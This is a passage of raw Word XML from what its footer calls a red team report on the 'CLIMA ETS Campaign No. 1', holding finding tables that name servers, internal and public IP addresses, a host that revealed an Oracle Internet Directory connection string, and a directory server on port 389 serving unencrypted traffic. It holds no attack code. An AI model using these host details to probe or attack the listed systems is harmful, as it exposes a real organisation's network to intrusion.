                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Oracle DB server: </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>olrdev34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="433BAEEA" w14:textId="24E99FBB" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="004C0F72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Ref213086292"/>
      <w:bookmarkStart w:id="261" w:name="_Ref213078520"/>
      <w:bookmarkStart w:id="262" w:name="_Toc213253589"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Servers that revealed the </w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:t>Oracle Internet Directory (</w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OID) </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>connection string</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
      <w:bookmarkEnd w:id="2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7"/>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="818"/>
        <w:gridCol w:w="1550"/>
        <w:gridCol w:w="2603"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C0F72" w:rsidRPr="001019D3" w14:paraId="1F93BA71" w14:textId="77777777" w:rsidTr="00FD1CD1">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63B213A8" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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A90D44" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</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14:paraId="0D6EBF80" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="887" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CB54426" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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045DEB" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0F72" w:rsidRPr="001019D3" w14:paraId="03761F3E" w14:textId="77777777" w:rsidTr="00FD1CD1">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="01645221" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.134.94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00AF6923" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02730.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="646114D4" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="887" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7B69040B" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CD0CF1" w14:textId="77777777" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24224EF8" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00B84673">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Ref213093980"/>
      <w:bookmarkStart w:id="264" w:name="_Toc213253590"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Server serving unencrypted Oracle Internet Directory (OID)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
      <w:bookmarkEnd w:id="2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72"/>
        <w:gridCol w:w="5268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="67B19218" w14:textId="77777777" w:rsidTr="00FD1CD1">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1986" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="533C4C85" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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06EA5" w14:textId="701C51CC" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN:port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="6E37F303" w14:textId="77777777" w:rsidTr="00FD1CD1">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1986" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="223EA0FA" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>158.167.240.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57B24CC4" w14:textId="6B1E07E8" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00FD1CD1">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>oid.cc.cec.eu.int:389</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="217"/>
      <w:bookmarkEnd w:id="261"/>
    </w:tbl>
    <w:p w14:paraId="62779C43" w14:textId="77777777" w:rsidR="0033159C" w:rsidRPr="002E1C34" w:rsidRDefault="0033159C"/>
    <w:sectPr w:rsidR="0033159C" w:rsidRPr="002E1C34" w:rsidSect="00035CD7">
      <w:footerReference w:type="default" r:id="rId50"/>
      <w:footerReference w:type="first" r:id="rId51"/>
      <w:endnotePr>
        <w:numFmt w:val="lowerLetter"/>
      </w:endnotePr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1021" w:right="1588" w:bottom="1021" w:left="1588"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67E3C" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C58642" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="092A9AF9" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287E885" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="00201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hnschrift SemiCondensed">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002C7" w:usb1="00000002" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>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4D97" w14:textId="2F8A36F2" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:pStyle w:val="FooterLine0"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-810400734"/>
        <w:dataBinding w:prefixMappings="xmlns:cp=&quot;http://schemas.openxmlformats.org/package/2006/metadata/core-properties&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:dcterms=&quot;http://purl.org/dc/terms/&quot;" w:xpath="/cp:coreProperties[1]/dc:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> - </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="315238660"/>
        <w:dataBinding w:prefixMappings="xmlns:cp=&quot;http://schemas.openxmlformats.org/package/2006/metadata/core-properties&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:dcterms=&quot;http://purl.org/dc/terms/&quot;" w:xpath="/cp:coreProperties[1]/dc:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00C05FB8" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="74B05F9C" w14:textId="31956E4A" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-773700497"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="-1180886056"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1854224481"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="818159633"/>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F1A3" w14:textId="1DC62DE7" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="006016FE">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="8732"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:right="0"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="139476565"/>
        <w:placeholder>
          <w:docPart w:val="6C66DCDBE8054EEDB04FA56C3BD57AE0"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="-937748794"/>
        <w:placeholder>
          <w:docPart w:val="BB56302F18754C8AA7690E71CD1C4D90"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="1179AA6E" w14:textId="46848944" w:rsidR="003C7E89" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-181746992"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="503251452"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1806580941"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="-492185134"/>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EC Footer - Without Author Data"/>
      <w:tag w:val="SVoGAZ38gakDmzcHmLly90-JTH5LX8azQN37Nf4Xh82U6"/>
      <w:id w:val="-1515994882"/>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
